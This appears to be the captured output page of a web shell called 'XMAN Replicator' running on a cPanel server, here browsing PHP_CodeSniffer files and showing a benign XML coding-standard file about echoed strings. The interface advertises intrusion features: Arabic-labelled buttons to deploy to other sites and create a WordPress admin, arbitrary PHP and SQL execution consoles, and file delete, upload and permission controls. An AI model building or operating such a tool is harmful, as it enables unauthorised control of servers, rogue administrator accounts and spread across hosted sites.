🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
squizlabs
/
php_codesniffer
/
src
/
Standards
/
Squiz
/
Docs
/
Strings
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2025-11-04 16:30
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2025-11-04 16:30
🔄
🗑️
🗑️📁
⬇️
🔒
EchoedStringsStandard.xml
501 B
-rw-r--r--
2025-11-04 16:30
✏️
🔄
🗑️
⬇️
🔒
View: EchoedStringsStandard.xml
<documentation title="Echoed Strings"> <standard> <![CDATA[ Simple strings should not be enclosed in parentheses when being echoed. ]]> </standard> <code_comparison> <code title="Valid: Using echo without parentheses."> <![CDATA[ echo<em> </em>"Hello"; ]]> </code> <code title="Invalid: Using echo with parentheses."> <![CDATA[ echo<em>(</em>"Hello"<em>)</em>; ]]> </code> </code_comparison> </documentation>
PHP Console
Execute
SQL Console
Execute